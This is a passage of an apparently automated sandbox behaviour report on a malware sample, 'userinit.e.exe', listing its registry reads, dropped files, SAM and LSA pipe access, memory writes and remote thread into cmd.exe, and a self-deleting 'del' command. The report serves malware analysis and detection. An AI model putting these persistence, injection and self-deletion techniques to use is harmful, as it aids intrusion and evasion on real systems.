HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ], Value Name: [ ItemSize ], Value: [ 517 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ], Value Name: [ SaferFlags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ], Value Name: [ HashAlg ], Value: [ 32771 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ], Value Name: [ ItemData ], Value: [ 0x327802dcfef8c893dc8ab006dd847d1d ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ], Value Name: [ ItemSize ], Value: [ 918 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ], Value Name: [ SaferFlags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ], Value Name: [ HashAlg ], Value: [ 32771 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ], Value Name: [ ItemData ], Value: [ 0xbd9a2adb42ebd8560e250e4df8162f67 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ], Value Name: [ ItemSize ], Value: [ 229 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ], Value Name: [ SaferFlags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ], Value Name: [ HashAlg ], Value: [ 32771 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ], Value Name: [ ItemData ], Value: [ 0x386b085f84ecf669d36b956a22c01e80 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ], Value Name: [ ItemSize ], Value: [ 370 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ], Value Name: [ SaferFlags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ], Value Name: [ ItemData ], Value: [ %HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK* ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ], Value Name: [ SaferFlags ], Value: [ 0 ], 1 time Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ], Value Name: [ ComputerName ], Value: [ PC ], 2 times Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ], Value Name: [ TSUserEnabled ], Value: [ 0 ], 1 time Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters ], Value Name: [ Domain ], Value: [ ], 1 time Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters ], Value Name: [ Hostname ], Value: [ pc ], 1 time Key: [ HKLM\System\Setup ], Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 2 times Key: [ HKLM\System\WPA\PnP ], Value Name: [ seed ], Value: [ 1274198464 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ], Value Name: [ Language Hotkey ], Value: [ 1 ], 2 times Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ], Value Name: [ Layout Hotkey ], Value: [ 2 ], 2 times Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\ ], Value Name: [ ShellState ], Value: [ 0x2400000038080000000000000000000000000000010000000d0000000000 ], 2 times Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ], Value Name: [ DontPrettyPath ], Value: [ 0 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ], Value Name: [ Filter ], Value: [ 0 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ], Value Name: [ Hidden ], Value: [ 1 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ], Value Name: [ HideFileExt ], Value: [ 0 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ], Value Name: [ HideIcons ], Value: [ 0 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ], Value Name: [ MapNetDrvBtn ], Value: [ 0 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ], Value Name: [ NoNetCrawling ], Value: [ 1 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ], Value Name: [ SeparateProcess ], Value: [ 0 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ], Value Name: [ ShowCompColor ], Value: [ 1 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ], Value Name: [ ShowInfoTip ], Value: [ 1 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ], Value Name: [ ShowSuperHidden ], Value: [ 1 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ], Value Name: [ WebView ], Value: [ 0 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{a1094da8-30a0-11dd-817b-806d6172696f}\ ], Value Name: [ Data ], Value: [ 0x000000005c005c003f005c0049004400450023004300640052006f006d00 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{a1094da8-30a0-11dd-817b-806d6172696f}\ ], Value Name: [ Generation ], Value: [ 1 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{a1094daa-30a0-11dd-817b-806d6172696f}\ ], Value Name: [ Data ], Value: [ 0x000000005c005c003f005c00530054004f00520041004700450023005600 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{a1094daa-30a0-11dd-817b-806d6172696f}\ ], Value Name: [ Generation ], Value: [ 1 ], 5 times Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], Value Name: [ Cache ], Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], Value Name: [ Cache ], Value: [ %USERPROFILE%\Local Settings\Temporary Internet Files ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], Value Name: [ Cookies ], Value: [ %USERPROFILE%\Cookies ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], Value Name: [ Desktop ], Value: [ %USERPROFILE%\Desktop ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], Value Name: [ Local AppData ], Value: [ %USERPROFILE%\Local Settings\Application Data ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], Value Name: [ Personal ], Value: [ %USERPROFILE%\My Documents ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 ], Value Name: [ 1806 ], Value: [ 0 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 ], Value Name: [ Flags ], Value: [ 33 ], 2 times Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 ], Value Name: [ Flags ], Value: [ 219 ], 2 times Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 ], Value Name: [ Flags ], Value: [ 71 ], 2 times Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 ], Value Name: [ Flags ], Value: [ 1 ], 2 times Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 ], Value Name: [ Flags ], Value: [ 3 ], 2 times Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\ShellNoRoam\MUICache ], Value Name: [ LangID ], Value: [ 0x0904 ], 1 time Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\ ], Value Name: [ C:\WINDOWS\system32\cmd.exe ], Value: [ Windows Command Processor ], 1 time [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Monitored Registry Keys: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Key: [ HKLM\Software\Classes ], Watch subtree: [ 1 ], Notify Filter: [ Key Change,Value Change ], 3 times Key: [ HKLM\Software\Classes\CLSID ], Watch subtree: [ 1 ], Notify Filter: [ Key Change,Value Change ], 2 times Key: [ HKLM\Software\Microsoft\COM3 ], Watch subtree: [ 1 ], Notify Filter: [ Key Change,Value Change ], 6 times Key: [ HKLM\system\CurrentControlSet\control\NetworkProvider\HwOrder ], Watch subtree: [ 0 ], Notify Filter: [ Value Change ], 1 time Key: [ HKU ], Watch subtree: [ 1 ], Notify Filter: [ Key Change,Value Change ], 3 times [=============================================================================] 2.b) userinit.e.exe - File Activities [=============================================================================] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Files Created: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] File Name: [ C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows ] File Name: [ C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\logs\ ] File Name: [ C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll ] File Name: [ C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.exe ] File Name: [ C:\Documents and Settings\All Users\Application Data\desktop.BIN ] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Files Read: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] File Name: [ C:\Documents and Settings\Administrator\My Documents\desktop.ini ] File Name: [ C:\Documents and Settings\All Users\Documents\desktop.ini ] File Name: [ C:\WINDOWS\Registration\R000000000007.clb ] File Name: [ C:\WINDOWS\system32\cmd.exe ] File Name: [ PIPE\lsarpc ] File Name: [ PIPE\samr ] File Name: [ PIPE\wkssvc ] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Files Modified: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] File Name: [ C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll ] File Name: [ C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.exe ] File Name: [ C:\Documents and Settings\All Users\Application Data\desktop.BIN ] File Name: [ Ip ] File Name: [ MountPointManager ] File Name: [ PIPE\lsarpc ] File Name: [ PIPE\samr ] File Name: [ PIPE\wkssvc ] File Name: [ \Device\Ip ] File Name: [ \Device\Tcp ] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Directories Created: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Directory: [ C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows ] Directory: [ C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\logs\ ] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] File System Control Communication: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] File: [ PIPE\samr ], Control Code: [ 0x0011C017 ], 15 times File: [ PIPE\wkssvc ], Control Code: [ 0x0011C017 ], 1 time File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 6 times [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Device Control Communication: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] File: [ \Device\Tcp ], Control Code: [ 0x00120003 ], 6 times File: [ \Device\KsecDD ], Control Code: [ 0x00390008 ], 8 times File: [ IDE#CdRomQEMU_QEMU_CD-ROM________________________0.9.____#4d51303030302033202020202020202020202020#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} ], Control Code: [ 0x004D0008 ], 1 time File: [ MountPointManager ], Control Code: [ 0x006D0008 ], 2 times File: [ STORAGE#Volume#1&30a96598&0&SignatureB15FB15FOffset7E00Length13F291800#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} ], Control Code: [ 0x004D0008 ], 1 time File: [ MountPointManager ], Control Code: [ 0x006D0034 ], 4 times [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Memory Mapped Files: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] File Name: [ C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll ] File Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ] File Name: [ C:\WINDOWS\WindowsShell.Manifest ] File Name: [ C:\WINDOWS\system32\Apphelp.dll ] File Name: [ C:\WINDOWS\system32\CLBCATQ.DLL ] File Name: [ C:\WINDOWS\system32\COMRes.dll ] File Name: [ C:\WINDOWS\system32\MSCTF.dll ] File Name: [ C:\WINDOWS\system32\SAMLIB.dll ] File Name: [ C:\WINDOWS\system32\SETUPAPI.dll ] File Name: [ C:\WINDOWS\system32\SHELL32.dll ] File Name: [ C:\WINDOWS\system32\WININET.dll ] File Name: [ C:\WINDOWS\system32\WS2HELP.dll ] File Name: [ C:\WINDOWS\system32\WS2_32.dll ] File Name: [ C:\WINDOWS\system32\cmd.exe ] File Name: [ C:\WINDOWS\system32\comctl32.dll ] File Name: [ C:\WINDOWS\system32\imm32.dll ] File Name: [ C:\WINDOWS\system32\iphlpapi.dll ] File Name: [ C:\WINDOWS\system32\rpcss.dll ] File Name: [ C:\WINDOWS\system32\urlmon.dll ] File Name: [ C:\Windows\AppPatch\sysmain.sdb ] File Name: [ C:\userinit.e.exe ] [=============================================================================] 2.c) userinit.e.exe - Process Activities [=============================================================================] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Processes Created: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Executable: [ C:\WINDOWS\system32\cmd.exe ], Command Line: [ ] Executable: [ C:\WINDOWS\system32\cmd.exe ], Command Line: [ "C:\WINDOWS\system32\cmd.exe" /c del C:\USERIN~1.EXE > nul ] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Remote Threads Created: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Affected Process: [ C:\WINDOWS\system32\cmd.exe ] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Foreign Memory Regions Read: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Process: [ C:\WINDOWS\system32\cmd.exe ] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Foreign Memory Regions Written: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Process: [ C:\WINDOWS\system32\cmd.exe ] [#############################################################################] 3. cmd.exe [#############################################################################] [=============================================================================] General information about this executable [=============================================================================] Analysis Reason: Started by userinit.e.exe Filename: cmd.exe MD5: 6d778e0f95447e6546553eeea709d03c SHA-1: 811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1 File Size: 389120 Bytes Command Line: "C:\WINDOWS\system32\cmd.exe" /c del C:\USERIN~1.EXE > nul Process-status at analysis end: dead Exit Code: 0 [=============================================================================] Load-time Dlls [=============================================================================] Module Name: [ C:\WINDOWS\system32\ntdll.dll ], Base Address: [0x7C900000 ], Size: [0x000AF000 ] Module Name: [ C:\WINDOWS\system32\kernel32.dll ], Base Address: [0x7C800000 ], Size: [0x000F6000 ] Module Name: [ C:\WINDOWS\system32\msvcrt.dll ], Base Address: [0x77C10000 ], Size: [0x00058000 ] Module Name: [ C:\WINDOWS\system32\USER32.dll ], Base Address: [0x7E410000 ], Size: [0x00091000 ] Module Name: [ C:\WINDOWS\system32\GDI32.dll ], Base Address: [0x77F10000 ], Size: [0x00049000 ] Module Name: [ C:\WINDOWS\system32\ShimEng.dll ], Base Address: [0x5CB70000 ], Size: [0x00026000 ] Module Name: [ C:\WINDOWS\AppPatch\AcGenral.DLL ], Base Address: [0x6F880000 ], Size: [0x001CA000 ] Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ], Base Address: [0x77DD0000 ], Size: [0x0009B000 ] Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ], Base Address: [0x77E70000 ], Size: [0x00092000 ] Module Name: [ C:\WINDOWS\system32\Secur32.dll ], Base Address: [0x77FE0000 ], Size: [0x00011000 ] Module Name: [ C:\WINDOWS\system32\WINMM.dll ], Base Address: [0x76B40000 ], Size: [0x0002D000 ] Module Name: [ C:\WINDOWS\system32\ole32.dll ], Base Address: [0x774E0000 ], Size: [0x0013D000 ] Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ], Base Address: [0x77120000 ], Size: [0x0008B000 ] Module Name: [ C:\WINDOWS\system32\MSACM32.dll ], Base Address: [0x77BE0000 ], Size: [0x00015000 ] Module Name: [ C:\WINDOWS\system32\VERSION.dll ], Base Address: [0x77C00000 ], Size: [0x00008000 ] Module Name: [ C:\WINDOWS\system32\SHELL32.dll ], Base Address: [0x7C9C0000 ], Size: [0x00817000 ] Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ], Base Address: [0x77F60000 ], Size: [0x00076000 ] Module Name: [ C:\WINDOWS\system32\USERENV.dll ], Base Address: [0x769C0000 ], Size: [0x000B4000 ] Module Name: [ C:\WINDOWS\system32\UxTheme.dll ], Base Address: [0x5AD70000 ], Size: [0x00038000 ] Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ], Base Address: [0x773D0000 ], Size: [0x00103000 ] Module Name: [ C:\WINDOWS\system32\comctl32.dll ], Base Address: [0x5D090000 ], Size: [0x0009A000 ] [=============================================================================] 3.a) cmd.exe - Registry Activities [=============================================================================] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Registry Values Read: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Key: [ HKLM\SYSTEM\CurrentControlSet\Control\Session Manager ], Value Name: [ CriticalSectionTimeout ], Value: [ 2592000 ], 1 time Key: [ HKLM\SYSTEM\Setup ], Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 1 time Key: [ HKLM\SYSTEM\WPA\MediaCenter ], Value Name: [ Installed ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.iac2 ], Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000000204000014000000 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.iac2 ], Value Name: [ cFilterTags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.iac2 ], Value Name: [ cFormatTags ], Value: [ 2 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.iac2 ], Value Name: [ fdwSupport ], Value: [ 1 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm ], Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000001100000014000000 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm ], Value Name: [ cFilterTags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm ], Value Name: [ cFormatTags ], Value: [ 2 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm ], Value Name: [ fdwSupport ], Value: [ 1 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm ], Value Name: [ aFormatTagCache ], Value: [ 0x0100000010000000550000001e000000 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm ], Value Name: [ cFilterTags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm ], Value Name: [ cFormatTags ], Value: [ 2 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm ], Value Name: [ fdwSupport ], Value: [ 1 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msadpcm ], Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000000200000032000000 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msadpcm ], Value Name: [ cFilterTags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msadpcm ], Value Name: [ cFormatTags ], Value: [ 2 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msadpcm ], Value Name: [ fdwSupport ], Value: [ 1 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ], Value Name: [ aFormatTagCache ], Value: [ 0x01000000120000006001000016000000610100001c000000 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ], Value Name: [ cFilterTags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ], Value Name: [ cFormatTags ], Value: [ 3 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ], Value Name: [ fdwSupport ], Value: [ 1 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ], Value Name: [ aFormatTagCache ], Value: [ 0x010000001000000006000000120000000700000012000000 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ], Value Name: [ cFilterTags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ], Value Name: [ cFormatTags ], Value: [ 3 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ], Value Name: [ fdwSupport ], Value: [ 1 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ], Value Name: [ aFormatTagCache ], Value: [ 0x0100000010000000420000001c000000 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ], Value Name: [ cFilterTags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ], Value Name: [ cFormatTags ], Value: [ 2 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ], Value Name: [ fdwSupport ], Value: [ 1 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ], Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000003100000014000000 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ], Value Name: [ cFilterTags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ], Value Name: [ cFormatTags ], Value: [ 2 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ], Value Name: [ fdwSupport ], Value: [ 1 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ], Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000003001000016000000 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ], Value Name: [ cFilterTags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ], Value Name: [ cFormatTags ], Value: [ 2 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ], Value Name: [ fdwSupport ], Value: [ 1 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ], Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000002200000032000000 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ], Value Name: [ cFilterTags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ], Value Name: [ cFormatTags ], Value: [ 2 ], 1 time Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ], Value Name: [ fdwSupport ], Value: [ 1 ], 1 time Key: [ HKLM\Software\Microsoft\Command Processor ], Value Name: [ AutoRun ], Value: [ ], 1 time 